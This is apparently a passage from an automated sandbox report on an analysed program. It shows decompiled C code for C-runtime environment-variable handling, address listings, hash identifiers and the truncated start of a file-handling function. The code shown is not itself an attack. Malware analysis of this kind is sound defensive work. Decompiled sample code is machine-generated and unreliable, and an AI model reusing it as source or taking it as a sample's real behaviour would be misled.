													E00430CA7();
													asm("int3");
													_t316 = _t321;
													_t322 = _t321 - 0xc;
													_push(_t218);
													_t220 = _v44;
													__eflags = _t220;
													if(_t220 != 0) {
														_push(_t300);
														_push(_t286);
														_push(0x3d);
														_t288 = _t220;
														_t133 = E00447457(_t241);
														_v20 = _t133;
														_t244 = _t220;
														__eflags = _t133;
														if(_t133 == 0) {
															L54:
															 *((intOrPtr*)(E00432914())) = 0x16;
															goto L55;
														} else {
															__eflags = _t133 - _t220;
															if(_t133 == _t220) {
																goto L54;
															} else {
																_t302 =  *0x4604c4; // 0x0
																_t221 = 0;
																__eflags =  *(_t133 + 2);
																_t246 = _t244 & 0xffffff00 |  *(_t133 + 2) == 0x00000000;
																_v9 = _t246;
																__eflags = _t302 -  *0x4604c8; // 0x0
																if(__eflags == 0) {
																	_push(_t302);
																	L104();
																	_t246 = _v9;
																	_t302 = _t133;
																	 *0x4604c4 = _t302;
																}
																__eflags = _t302;
																if(_t302 != 0) {
																	L64:
																	_v20 = _v20 - _t288 >> 1;
																	_t138 = E0043D4D8(_t288, _v20 - _t288 >> 1);
																	_v16 = _t138;
																	__eflags = _t138;
																	if(_t138 < 0) {
																		L72:
																		__eflags = _v9 - _t221;
																		if(_v9 != _t221) {
																			goto L56;
																		} else {
																			_t139 =  ~_t138;
																			_v16 = _t139;
																			_t72 = _t139 + 2; // 0x2
																			_t252 = _t72;
																			__eflags = _t252 - _t139;
																			if(_t252 < _t139) {
																				goto L55;
																			} else {
																				__eflags = _t252 - 0x3fffffff;
																				if(_t252 >= 0x3fffffff) {
																					goto L55;
																				} else {
																					_push(4);
																					_push(_t252);
																					_t303 = E0043D545(_t302);
																					E00437795(_t221);
																					_t322 = _t322 + 0x10;
																					__eflags = _t303;
																					if(_t303 == 0) {
																						goto L55;
																					} else {
																						_t253 = _v16;
																						_t288 = _t221;
																						_t142 = _v0;
																						 *(_t303 + _t253 * 4) = _t142;
																						 *(_t303 + 4 + _t253 * 4) = _t221;
																						goto L77;
																					}
																				}
																			}
																		}
																	} else {
																		__eflags =  *_t302 - _t221;
																		if( *_t302 == _t221) {
																			goto L72;
																		} else {
																			E00437795( *((intOrPtr*)(_t302 + _t138 * 4)));
																			_t276 = _v16;
																			__eflags = _v9 - _t221;
																			if(_v9 != _t221) {
																				while(1) {
																					__eflags =  *(_t302 + _t276 * 4) - _t221;
																					if( *(_t302 + _t276 * 4) == _t221) {
																						break;
																					}
																					 *(_t302 + _t276 * 4) =  *(_t302 + 4 + _t276 * 4);
																					_t276 = _t276 + 1;
																					__eflags = _t276;
																				}
																				_push(4);
																				_push(_t276);
																				_t303 = E0043D545(_t302);
																				E00437795(_t221);
																				_t322 = _t322 + 0x10;
																				_t142 = _t288;
																				__eflags = _t303;
																				if(_t303 != 0) {
																					L77:
																					 *0x4604c4 = _t303;
																				}
																			} else {
																				_t142 = _v0;
																				_t288 = _t221;
																				 *(_t302 + _t276 * 4) = _t142;
																			}
																			__eflags = _a4 - _t221;
																			if(_a4 == _t221) {
																				goto L56;
																			} else {
																				_t254 = _t142;
																				_t81 = _t254 + 2; // 0x2
																				_t284 = _t81;
																				do {
																					_t143 =  *_t254;
																					_t254 = _t254 + 2;
																					__eflags = _t143 - _t221;
																				} while (_t143 != _t221);
																				_t82 = (_t254 - _t284 >> 1) + 2; // 0x0
																				_v16 = _t82;
																				_t304 = E004368EF(_t254 - _t284 >> 1, _t82, 2);
																				_pop(_t258);
																				__eflags = _t304;
																				if(_t304 == 0) {
																					L85:
																					E00437795(_t304);
																					goto L56;
																				} else {
																					_t148 = E00437840(_t304, _v16, _v0);
																					_t323 = _t322 + 0xc;
																					__eflags = _t148;
																					if(_t148 != 0) {
																						_push(_t221);
																						_push(_t221);
																						_push(_t221);
																						_push(_t221);
																						_push(_t221);
																						E00430CA7();
																						asm("int3");
																						_push(_t316);
																						_t317 = _t323;
																						_push(_t288);
																						_t290 = _v92;
																						__eflags = _t290;
																						if(_t290 != 0) {
																							_t260 = 0;
																							_t150 = _t290;
																							__eflags =  *_t290;
																							if( *_t290 != 0) {
																								do {
																									_t150 =  &(_t150[1]);
																									_t260 = _t260 + 1;
																									__eflags =  *_t150;
																								} while ( *_t150 != 0);
																							}
																							_t93 = _t260 + 1; // 0x2
																							_t305 = E004368EF(_t260, _t93, 4);
																							_t262 = _t304;
																							__eflags = _t305;
																							if(_t305 == 0) {
																								L102:
																								E00436EF0(_t221, _t284, _t290, _t305);
																								goto L103;
																							} else {
																								__eflags =  *_t290;
																								if( *_t290 == 0) {
																									L100:
																									E00437795(0);
																									_t175 = _t305;
																									goto L101;
																								} else {
																									_push(_t221);
																									_t221 = _t305 - _t290;
																									__eflags = _t221;
																									do {
																										_t271 =  *_t290;
																										_t94 = _t271 + 1; // 0x5
																										_t284 = _t94;
																										do {
																											_t176 =  *_t271;
																											_t271 = _t271 + 1;
																											__eflags = _t176;
																										} while (_t176 != 0);
																										_t262 = _t271 - _t284;
																										_t95 = _t262 + 1; // 0x6
																										_v16 = _t95;
																										 *(_t221 + _t290) = E004368EF(_t262, _t95, 1);
																										E00437795(0);
																										_t323 = _t323 + 0xc;
																										__eflags =  *(_t221 + _t290);
																										if( *(_t221 + _t290) == 0) {
																											goto L102;
																										} else {
																											_t180 = E00437B82( *(_t221 + _t290), _v16,  *_t290);
																											_t323 = _t323 + 0xc;
																											__eflags = _t180;
																											if(_t180 != 0) {
																												L103:
																												_push(0);
																												_push(0);
																												_push(0);
																												_push(0);
																												_push(0);
																												E00430CA7();
																												asm("int3");
																												_push(_t317);
																												_t318 = _t323;
																												_push(_t262);
																												_push(_t262);
																												_push(_t290);
																												_t291 = _v128;
																												__eflags = _t291;
																												if(_t291 != 0) {
																													_push(_t221);
																													_t223 = 0;
																													_t156 = _t291;
																													_t263 = 0;
																													_v20 = 0;
																													_push(_t305);
																													__eflags =  *_t291;
																													if( *_t291 != 0) {
																														do {
																															_t156 =  &(_t156[1]);
																															_t263 = _t263 + 1;
																															__eflags =  *_t156;
																														} while ( *_t156 != 0);
																													}
																													_t104 = _t263 + 1; // 0x2
																													_t306 = E004368EF(_t263, _t104, 4);
																													__eflags = _t306;
																													if(_t306 == 0) {
																														L119:
																														E00436EF0(_t223, _t284, _t291, _t306);
																														goto L120;
																													} else {
																														__eflags =  *_t291 - _t223;
																														if( *_t291 == _t223) {
																															L117:
																															E00437795(_t223);
																															_t167 = _t306;
																															goto L118;
																														} else {
																															_t223 = _t306 - _t291;
																															__eflags = _t223;
																															do {
																																_t267 =  *_t291;
																																_t105 = _t267 + 2; // 0x6
																																_t284 = _t105;
																																do {
																																	_t168 =  *_t267;
																																	_t267 = _t267 + 2;
																																	__eflags = _t168 - _v20;
																																} while (_t168 != _v20);
																																_t107 = (_t267 - _t284 >> 1) + 1; // 0x3
																																_v24 = _t107;
																																 *(_t223 + _t291) = E004368EF(_t267 - _t284 >> 1, _t107, 2);
																																E00437795(0);
																																_t323 = _t323 + 0xc;
																																__eflags =  *(_t223 + _t291);
																																if( *(_t223 + _t291) == 0) {
																																	goto L119;
																																} else {
																																	_t173 = E00437840( *(_t223 + _t291), _v24,  *_t291);
																																	_t323 = _t323 + 0xc;
																																	__eflags = _t173;
																																	if(_t173 != 0) {
																																		L120:
																																		_push(0);
																																		_push(0);
																																		_push(0);
																																		_push(0);
																																		_push(0);
																																		E00430CA7();
																																		asm("int3");
																																		_push(_t318);
																																		_push(_t223);
																																		_push(_t306);
																																		_push(_t291);
																																		_t292 =  *0x4604c0; // 0x47b508
																																		_t307 = _t292;
																																		__eflags =  *_t292;
																																		if( *_t292 == 0) {
																																			L127:
																																			_t308 = _t307 - _t292;
																																			__eflags = _t308;
																																			_t310 =  ~(_t308 >> 2);
																																		} else {
																																			_t225 = _v8;
																																			do {
																																				_t163 = E00439C45(_v12,  *_t307, _t225);
																																				_t323 = _t323 + 0xc;
																																				__eflags = _t163;
																																				if(_t163 != 0) {
																																					goto L126;
																																				} else {
																																					_t165 =  *((intOrPtr*)(_t225 +  *_t307));
																																					__eflags = _t165 - 0x3d;
																																					if(_t165 == 0x3d) {
																																						L129:
																																						_t310 = _t307 - _t292 >> 2;
																																					} else {
																																						__eflags = _t165;
																																						if(_t165 == 0) {
																																							goto L129;
																																						} else {
																																							goto L126;
																																						}
																																					}
																																				}
																																				goto L128;
																																				L126:
																																				_t307 =  &(_t307[1]);
																																				__eflags =  *_t307;
																																			} while ( *_t307 != 0);
																																			goto L127;
																																		}
																																		L128:
																																		return _t310;
																																	} else {
																																		goto L115;
																																	}
																																}
																																goto L130;
																																L115:
																																_t291 = _t291 + 4;
																																__eflags =  *_t291 - _t173;
																															} while ( *_t291 != _t173);
																															_t223 = 0;
																															__eflags = 0;
																															goto L117;
																														}
																													}
																												} else {
																													_t167 = 0;
																													L118:
																													return _t167;
																												}
																											} else {
																												goto L98;
																											}
																										}
																										goto L130;
																										L98:
																										_t290 = _t290 + 4;
																										__eflags =  *_t290 - _t180;
																									} while ( *_t290 != _t180);
																									goto L100;
																								}
																							}
																						} else {
																							_t175 = 0;
																							L101:
																							return _t175;
																						}
																					} else {
																						_t274 =  &(_t304[_v20 + 1]);
																						 *(_t274 - 2) = _t148;
																						asm("sbb eax, eax");
																						_t185 = SetEnvironmentVariableW(_t304,  !( ~(_v9 & 0x000000ff)) & _t274);
																						__eflags = _t185;
																						if(_t185 == 0) {
																							_t186 = E00432914();
																							_t221 = _t221 | 0xffffffff;
																							__eflags = _t221;
																							 *_t186 = 0x2a;
																						}
																						goto L85;
																					}
																				}
																			}
																		}
																	}
																} else {
																	_t191 =  *0x4604c0; // 0x47b508
																	__eflags = _a4 - _t221;
																	if(_a4 == _t221) {
																		L58:
																		__eflags = _t246;
																		if(_t246 != 0) {
																			goto L56;
																		} else {
																			__eflags = _t191;
																			if(_t191 != 0) {
																				L62:
																				 *0x4604c4 = E004368EF(_t246, 1, 4);
																				E00437795(_t221);
																				_t322 = _t322 + 0xc;
																				goto L63;
																			} else {
																				 *0x4604c0 = E004368EF(_t246, 1, 4);
																				E00437795(_t221);
																				_t322 = _t322 + 0xc;
																				__eflags =  *0x4604c0 - _t221; // 0x47b508
																				if(__eflags == 0) {
																					goto L55;
																				} else {
																					_t302 =  *0x4604c4; // 0x0
																					__eflags = _t302;
																					if(_t302 != 0) {
																						goto L64;
																					} else {
																						goto L62;
																					}
																				}
																			}
																		}
																	} else {
																		__eflags = _t191;
																		if(_t191 == 0) {
																			goto L58;
																		} else {
																			_t196 = L00434BED(_t221);
																			__eflags = _t196;
																			if(_t196 != 0) {
																				L63:
																				_t302 =  *0x4604c4; // 0x0
																				__eflags = _t302;
																				if(_t302 == 0) {
																					L55:
																					_t221 = _t220 | 0xffffffff;
																					__eflags = _t221;
																					L56:
																					E00437795(_t288);
																					_t136 = _t221;
																					goto L57;
																				} else {
																					goto L64;
																				}
																			} else {
																				goto L54;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t197 = E00432914();
														 *_t197 = 0x16;
														_t136 = _t197 | 0xffffffff;
														L57:
														return _t136;
													}
												} else {
													_t280 = _v16 + 1 + _t300 - _a4;
													asm("sbb eax, eax");
													 *(_t280 - 1) = _t218;
													_t204 = SetEnvironmentVariableA(_t300,  !( ~(_v5 & 0x000000ff)) & _t280);
													__eflags = _t204;
													if(_t204 == 0) {
														_t205 = E00432914();
														_t218 = _t218 | 0xffffffff;
														__eflags = _t218;
														 *_t205 = 0x2a;
													}
													goto L42;
												}
											}
										}
									}
								}
							} else {
								__eflags = _a8;
								if(_a8 == 0) {
									L14:
									__eflags = _t120;
									if(_t120 == 0) {
										 *0x4604c0 = E004368EF(_t231, 1, 4);
										E00437795(_t218);
										_t298 =  *0x4604c0; // 0x47b508
										_t320 = _t320 + 0xc;
										__eflags = _t298;
										if(_t298 == 0) {
											goto L11;
										} else {
											__eflags =  *0x4604c4 - _t218; // 0x0
											if(__eflags != 0) {
												goto L20;
											} else {
												 *0x4604c4 = E004368EF(_t231, 1, 4);
												E00437795(_t218);
												_t320 = _t320 + 0xc;
												__eflags =  *0x4604c4 - _t218; // 0x0
												if(__eflags == 0) {
													goto L11;
												} else {
													goto L19;
												}
											}
										}
									} else {
										_t218 = 0;
										goto L12;
									}
								} else {
									__eflags =  *0x4604c4 - _t218; // 0x0
									if(__eflags == 0) {
										goto L14;
									} else {
										_t214 = L00434BE8(0);
										__eflags = _t214;
										if(_t214 != 0) {
											L19:
											_t298 =  *0x4604c0; // 0x47b508
											L20:
											__eflags = _t298;
											if(_t298 == 0) {
												L11:
												_t218 = _t217 | 0xffffffff;
												__eflags = _t218;
												L12:
												E00437795(_t286);
												_t119 = _t218;
												goto L13;
											} else {
												goto L21;
											}
										} else {
											goto L10;
										}
									}
								}
							}
						}
					}
				} else {
					_t215 = E00432914();
					 *_t215 = 0x16;
					_t119 = _t215 | 0xffffffff;
					L13:
					return _t119;
				}
				L130:
			}








































































































                                            0x0043cea6
                                            0x0043ceab
                                            0x0043cec2
                                            0x0043cec4
                                            0x0043cec9
                                            0x0043cecd
                                            0x0043cece
                                            0x0043ced0
                                            0x0043cf20
                                            0x0043cf25
                                            0x00000000
                                            0x0043ced2
                                            0x0043ced2
                                            0x0043ced4
                                            0x00000000
                                            0x0043ced6
                                            0x0043ced6
                                            0x0043ceda
                                            0x0043cee0
                                            0x0043cee3
                                            0x0043cee6
                                            0x0043ceec
                                            0x0043ceef
                                            0x0043cef4
                                            0x0043cef6
                                            0x0043cef9
                                            0x0043cefa
                                            0x0043cefa
                                            0x0043cf00
                                            0x0043cf02
                                            0x0043cf04
                                            0x0043cf98
                                            0x0043cf9b
                                            0x0043cf9d
                                            0x0043cf9f
                                            0x0043cfa0
                                            0x0043cfa1
                                            0x0043cfa6
                                            0x0043cfab
                                            0x0043cfad
                                            0x0043cff7
                                            0x0043cff7
                                            0x0043cffa
                                            0x00000000
                                            0x0043d000
                                            0x0043d000
                                            0x0043d002
                                            0x0043d005
                                            0x0043d005
                                            0x0043d008
                                            0x0043d00a
                                            0x00000000
                                            0x0043d010
                                            0x0043d010
                                            0x0043d016
                                            0x00000000
                                            0x0043d01c
                                            0x0043d01c
                                            0x0043d01e
                                            0x0043d026
                                            0x0043d028
                                            0x0043d02d
                                            0x0043d030
                                            0x0043d032
                                            0x00000000
                                            0x0043d038
                                            0x0043d038
                                            0x0043d03b
                                            0x0043d03d
                                            0x0043d040
                                            0x0043d043
                                            0x00000000
                                            0x0043d043
                                            0x0043d032
                                            0x0043d016
                                            0x0043d00a
                                            0x0043cfaf
                                            0x0043cfaf
                                            0x0043cfb1
                                            0x00000000
                                            0x0043cfb3
                                            0x0043cfb6
                                            0x0043cfbc
                                            0x0043cfbf
                                            0x0043cfc2
                                            0x0043cfd6
                                            0x0043cfd6
                                            0x0043cfd9
                                            0x00000000
                                            0x00000000
                                            0x0043cfd2
                                            0x0043cfd5
                                            0x0043cfd5
                                            0x0043cfd5
                                            0x0043cfdb
                                            0x0043cfdd
                                            0x0043cfe5
                                            0x0043cfe7
                                            0x0043cfec
                                            0x0043cfef
                                            0x0043cff1
                                            0x0043cff3
                                            0x0043d047
                                            0x0043d047
                                            0x0043d047
                                            0x0043cfc4
                                            0x0043cfc4
                                            0x0043cfc7
                                            0x0043cfc9
                                            0x0043cfc9
                                            0x0043d04d
                                            0x0043d050
                                            0x00000000
                                            0x0043d056
                                            0x0043d056
                                            0x0043d058
                                            0x0043d05b
                                            0x0043d05b
                                            0x0043d05d
                                            0x0043d05e
                                            0x0043d05e
                                            0x0043d06a
                                            0x0043d072
                                            0x0043d075
                                            0x0043d076
                                            0x0043d078
                                            0x0043d0c1
                                            0x0043d0c2
                                            0x00000000
                                            0x0043d07a
                                            0x0043d081
                                            0x0043d086
                                            0x0043d089
                                            0x0043d08b
                                            0x0043d0cd
                                            0x0043d0ce
                                            0x0043d0cf
                                            0x0043d0d0
                                            0x0043d0d1
                                            0x0043d0d2
                                            0x0043d0d7
                                            0x0043d0db
                                            0x0043d0dd
                                            0x0043d0e0
                                            0x0043d0e1
                                            0x0043d0e4
                                            0x0043d0e6
                                            0x0043d0f8
                                            0x0043d0f9
                                            0x0043d0fa
                                            0x0043d0fd
                                            0x0043d0ff
                                            0x0043d104
                                            0x0043d108
                                            0x0043d109
                                            0x0043d10b
                                            0x0043d15c
                                            0x0043d161
                                            0x00000000
                                            0x0043d10d
                                            0x0043d10d
                                            0x0043d10f
                                            0x00000000
                                            0x0043d111
                                            0x0043d111
                                            0x0043d117
                                            0x0043d119
                                            0x0043d11d
                                            0x0043d120
                                            0x0043d123
                                            0x0043d129
                                            0x0043d12b
                                            0x0043d12c
                                            0x0043d132
                                            0x0043d135
                                            0x0043d137
                                            0x0043d137
                                            0x0043d13d
                                            0x0043d13f
                                            0x0043d1cc
                                            0x0043d1d7
                                            0x0043d1da
                                            0x0043d1df
                                            0x0043d1e4
                                            0x0043d1e6
                                            0x0043d230
                                            0x0043d230
                                            0x0043d233
                                            0x00000000
                                            0x0043d239
                                            0x0043d239
                                            0x0043d23b
                                            0x0043d23e
                                            0x0043d23e
                                            0x0043d241
                                            0x0043d243
                                            0x00000000
                                            0x0043d249
                                            0x0043d249
                                            0x0043d24f
                                            0x00000000
                                            0x0043d255
                                            0x0043d255
                                            0x0043d257
                                            0x0043d25f
                                            0x0043d261
                                            0x0043d266
                                            0x0043d269
                                            0x0043d26b
                                            0x00000000
                                            0x0043d271
                                            0x0043d271
                                            0x0043d274
                                            0x0043d276
                                            0x0043d279
                                            0x0043d27c
                                            0x00000000
                                            0x0043d27c
                                            0x0043d26b
                                            0x0043d24f
                                            0x0043d243
                                            0x0043d1e8
                                            0x0043d1e8
                                            0x0043d1ea
                                            0x00000000
                                            0x0043d1ec
                                            0x0043d1ef
                                            0x0043d1f5
                                            0x0043d1f8
                                            0x0043d1fb
                                            0x0043d20f
                                            0x0043d20f
                                            0x0043d212
                                            0x00000000
                                            0x00000000
                                            0x0043d20b
                                            0x0043d20e
                                            0x0043d20e
                                            0x0043d20e
                                            0x0043d214
                                            0x0043d216
                                            0x0043d21e
                                            0x0043d220
                                            0x0043d225
                                            0x0043d228
                                            0x0043d22a
                                            0x0043d22c
                                            0x0043d280
                                            0x0043d280
                                            0x0043d280
                                            0x0043d1fd
                                            0x0043d1fd
                                            0x0043d200
                                            0x0043d202
                                            0x0043d202
                                            0x0043d286
                                            0x0043d289
                                            0x00000000
                                            0x0043d28f
                                            0x0043d28f
                                            0x0043d291
                                            0x0043d291
                                            0x0043d294
                                            0x0043d294
                                            0x0043d297
                                            0x0043d29a
                                            0x0043d29a
                                            0x0043d2a5
                                            0x0043d2a9
                                            0x0043d2b1
                                            0x0043d2b4
                                            0x0043d2b5
                                            0x0043d2b7
                                            0x0043d2fe
                                            0x0043d2ff
                                            0x00000000
                                            0x0043d2b9
                                            0x0043d2c1
                                            0x0043d2c6
                                            0x0043d2c9
                                            0x0043d2cb
                                            0x0043d30a
                                            0x0043d30b
                                            0x0043d30c
                                            0x0043d30d
                                            0x0043d30e
                                            0x0043d30f
                                            0x0043d314
                                            0x0043d317
                                            0x0043d318
                                            0x0043d31b
                                            0x0043d31c
                                            0x0043d31f
                                            0x0043d321
                                            0x0043d32a
                                            0x0043d32c
                                            0x0043d32e
                                            0x0043d330
                                            0x0043d332
                                            0x0043d332
                                            0x0043d335
                                            0x0043d336
                                            0x0043d336
                                            0x0043d332
                                            0x0043d33c
                                            0x0043d347
                                            0x0043d34a
                                            0x0043d34b
                                            0x0043d34d
                                            0x0043d3b4
                                            0x0043d3b4
                                            0x00000000
                                            0x0043d34f
                                            0x0043d34f
                                            0x0043d352
                                            0x0043d3a4
                                            0x0043d3a6
                                            0x0043d3ac
                                            0x00000000
                                            0x0043d354
                                            0x0043d354
                                            0x0043d357
                                            0x0043d357
                                            0x0043d359
                                            0x0043d359
                                            0x0043d35b
                                            0x0043d35b
                                            0x0043d35e
                                            0x0043d35e
                                            0x0043d360
                                            0x0043d361
                                            0x0043d361
                                            0x0043d365
                                            0x0043d369
                                            0x0043d36d
                                            0x0043d377
                                            0x0043d37a
                                            0x0043d37f
                                            0x0043d382
                                            0x0043d386
                                            0x00000000
                                            0x0043d388
                                            0x0043d390
                                            0x0043d395
                                            0x0043d398
                                            0x0043d39a
                                            0x0043d3b9
                                            0x0043d3bb
                                            0x0043d3bc
                                            0x0043d3bd
                                            0x0043d3be
                                            0x0043d3bf
                                            0x0043d3c0
                                            0x0043d3c5
                                            0x0043d3c8
                                            0x0043d3c9
                                            0x0043d3cb
                                            0x0043d3cc
                                            0x0043d3cd
                                            0x0043d3ce
                                            0x0043d3d1
                                            0x0043d3d3
                                            0x0043d3dc
                                            0x0043d3dd
                                            0x0043d3df
                                            0x0043d3e1
                                            0x0043d3e3
                                            0x0043d3e6
                                            0x0043d3e7
                                            0x0043d3e9
                                            0x0043d3eb
                                            0x0043d3eb
                                            0x0043d3ee
                                            0x0043d3ef
                                            0x0043d3ef
                                            0x0043d3eb
                                            0x0043d3f3
                                            0x0043d3fe
                                            0x0043d402
                                            0x0043d404
                                            0x0043d472
                                            0x0043d472
                                            0x00000000
                                            0x0043d406
                                            0x0043d406
                                            0x0043d408
                                            0x0043d462
                                            0x0043d463
                                            0x0043d469
                                            0x00000000
                                            0x0043d40a
                                            0x0043d40c
                                            0x0043d40c
                                            0x0043d40e
                                            0x0043d40e
                                            0x0043d410
                                            0x0043d410
                                            0x0043d413
                                            0x0043d413
                                            0x0043d416
                                            0x0043d419
                                            0x0043d419
                                            0x0043d425
                                            0x0043d429
                                            0x0043d431
                                            0x0043d437
                                            0x0043d43c
                                            0x0043d43f
                                            0x0043d443
                                            0x00000000
                                            0x0043d445
                                            0x0043d44d
                                            0x0043d452
                                            0x0043d455
                                            0x0043d457
                                            0x0043d477
                                            0x0043d479
                                            0x0043d47a
                                            0x0043d47b
                                            0x0043d47c
                                            0x0043d47d
                                            0x0043d47e
                                            0x0043d483
                                            0x0043d486
                                            0x0043d489
                                            0x0043d48a
                                            0x0043d48b
                                            0x0043d48c
                                            0x0043d492
                                            0x0043d494
                                            0x0043d497
                                            0x0043d4c3
                                            0x0043d4c3
                                            0x0043d4c3
                                            0x0043d4c8
                                            0x0043d499
                                            0x0043d499
                                            0x0043d49c
                                            0x0043d4a2
                                            0x0043d4a7
                                            0x0043d4aa
                                            0x0043d4ac
                                            0x00000000
                                            0x0043d4ae
                                            0x0043d4b0
                                            0x0043d4b3
                                            0x0043d4b5
                                            0x0043d4d1
                                            0x0043d4d3
                                            0x0043d4b7
                                            0x0043d4b7
                                            0x0043d4b9
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0043d4b9
                                            0x0043d4b5
                                            0x00000000
                                            0x0043d4bb
                                            0x0043d4bb
                                            0x0043d4be
                                            0x0043d4be
                                            0x00000000
                                            0x0043d49c
                                            0x0043d4ca
                                            0x0043d4d0
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0043d457
                                            0x00000000
                                            0x0043d459
                                            0x0043d459
                                            0x0043d45c
                                            0x0043d45c
                                            0x0043d460
                                            0x0043d460
                                            0x00000000
                                            0x0043d460
                                            0x0043d408
                                            0x0043d3d5
                                            0x0043d3d5
                                            0x0043d46d
                                            0x0043d471
                                            0x0043d471
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0043d39a
                                            0x00000000
                                            0x0043d39c
                                            0x0043d39c
                                            0x0043d39f
                                            0x0043d39f
                                            0x00000000
                                            0x0043d3a3
                                            0x0043d352
                                            0x0043d323
                                            0x0043d323
                                            0x0043d3af
                                            0x0043d3b3
                                            0x0043d3b3
                                            0x0043d2cd
                                            0x0043d2d1
                                            0x0043d2d4
                                            0x0043d2de
                                            0x0043d2e6
                                            0x0043d2ec
                                            0x0043d2ee
                                            0x0043d2f0
                                            0x0043d2f5
                                            0x0043d2f5
                                            0x0043d2f8
                                            0x0043d2f8
                                            0x00000000
                                            0x0043d2ee
                                            0x0043d2cb
                                            0x0043d2b7
                                            0x0043d289
                                            0x0043d1ea
                                            0x0043d145
                                            0x0043d145
                                            0x0043d14a
                                            0x0043d14d
                                            0x0043d17a
                                            0x0043d17a
                                            0x0043d17c
                                            0x00000000
                                            0x0043d17e
                                            0x0043d17e
                                            0x0043d180
                                            0x0043d1ab
                                            0x0043d1b5
                                            0x0043d1ba
                                            0x0043d1bf
                                            0x00000000
                                            0x0043d182
                                            0x0043d18c
                                            0x0043d191
                                            0x0043d196
                                            0x0043d199
                                            0x0043d19f
                                            0x00000000
                                            0x0043d1a1
                                            0x0043d1a1
                                            0x0043d1a7
                                            0x0043d1a9
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0043d1a9
                                            0x0043d19f
                                            0x0043d180
                                            0x0043d14f
                                            0x0043d14f
                                            0x0043d151
                                            0x00000000
                                            0x0043d153
                                            0x0043d153
                                            0x0043d158
                                            0x0043d15a
                                            0x0043d1c2
                                            0x0043d1c2
                                            0x0043d1c8
                                            0x0043d1ca
                                            0x0043d167
                                            0x0043d167
                                            0x0043d167
                                            0x0043d16a
                                            0x0043d16b
                                            0x0043d172
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0043d15a
                                            0x0043d151
                                            0x0043d14d
                                            0x0043d13f
                                            0x0043d10f
                                            0x0043d0e8
                                            0x0043d0e8
                                            0x0043d0ed
                                            0x0043d0f3
                                            0x0043d175
                                            0x0043d179
                                            0x0043d179
                                            0x0043d08d
                                            0x0043d096
                                            0x0043d09e
                                            0x0043d0a2
                                            0x0043d0a9
                                            0x0043d0af
                                            0x0043d0b1
                                            0x0043d0b3
                                            0x0043d0b8
                                            0x0043d0b8
                                            0x0043d0bb
                                            0x0043d0bb
                                            0x00000000
                                            0x0043d0b1
                                            0x0043d08b
                                            0x0043d078
                                            0x0043d050
                                            0x0043cfb1
                                            0x0043cf0a
                                            0x0043cf0a
                                            0x0043cf0d
                                            0x0043cf3e
                                            0x0043cf3e
                                            0x0043cf40
                                            0x0043cf50
                                            0x0043cf55
                                            0x0043cf5a
                                            0x0043cf60
                                            0x0043cf63
                                            0x0043cf65
                                            0x00000000
                                            0x0043cf67
                                            0x0043cf67
                                            0x0043cf6d
                                            0x00000000
                                            0x0043cf6f
                                            0x0043cf79
                                            0x0043cf7e
                                            0x0043cf83
                                            0x0043cf86
                                            0x0043cf8c
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0043cf8c
                                            0x0043cf6d
                                            0x0043cf42
                                            0x0043cf42
                                            0x00000000
                                            0x0043cf42
                                            0x0043cf0f
                                            0x0043cf0f
                                            0x0043cf15
                                            0x00000000
                                            0x0043cf17
                                            0x0043cf17
                                            0x0043cf1c
                                            0x0043cf1e
                                            0x0043cf8e
                                            0x0043cf8e
                                            0x0043cf94
                                            0x0043cf94
                                            0x0043cf96
                                            0x0043cf2b
                                            0x0043cf2b
                                            0x0043cf2b
                                            0x0043cf2e
                                            0x0043cf2f
                                            0x0043cf36
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0043cf1e
                                            0x0043cf15
                                            0x0043cf0d
                                            0x0043cf04
                                            0x0043ced4
                                            0x0043cead
                                            0x0043cead
                                            0x0043ceb2
                                            0x0043ceb8
                                            0x0043cf39
                                            0x0043cf3d
                                            0x0043cf3d
                                            0x00000000

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: _free$EnvironmentVariable$___from_strstr_to_strchr_wcschr
                                            • String ID:
                                            • API String ID: 2719235668-0
                                            • Opcode ID: d1e4d49796f5e62e46d63f8738f8c906c4d9f5b1dea3f612ff2c3f8dd7cb332c
                                            • Instruction ID: bfd65ad35ea4232fd12d5f18695b9cfc6a4eb7d4fc1baa9a117f3ffd12e5ca0b
                                            • Opcode Fuzzy Hash: d1e4d49796f5e62e46d63f8738f8c906c4d9f5b1dea3f612ff2c3f8dd7cb332c
                                            • Instruction Fuzzy Hash: C9D166B1D053006BDB34AF75A88166B77A5AF0D358F04226FF944AB3C2EB3D9901875D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004044C5, Relevance: 26.6, APIs: 9, Strings: 6, Instructions: 345fileCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 77%
                                            			E004044C5(intOrPtr __ecx, void* __edx, WCHAR* _a4, char _a8, char _a32, char _a56) {
				void* _v12;
				union _LARGE_INTEGER _v16;
				struct _OVERLAPPED* _v20;
				long _v24;
				long _v28;
				intOrPtr _v32;
				long _v36;
				struct _OVERLAPPED* _v40;
				union _LARGE_INTEGER* _v44;
				signed int _v48;
				signed int _v52;
				struct %anon52 _v64;
				intOrPtr _v68;
				struct %anon52 _v80;
				union _LARGE_INTEGER _v84;
				intOrPtr _v88;
				char _v112;
				char _v136;
				char _v160;
				char _v184;
				char _v208;
				char _v232;
				char _v256;
				char _v280;
				char _v304;
				char _v328;
				char _v352;
				char _v376;
				char _v400;
				char _v424;
				char _v448;
				char _v472;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct %anon52 _t117;
				void* _t119;
				void* _t126;
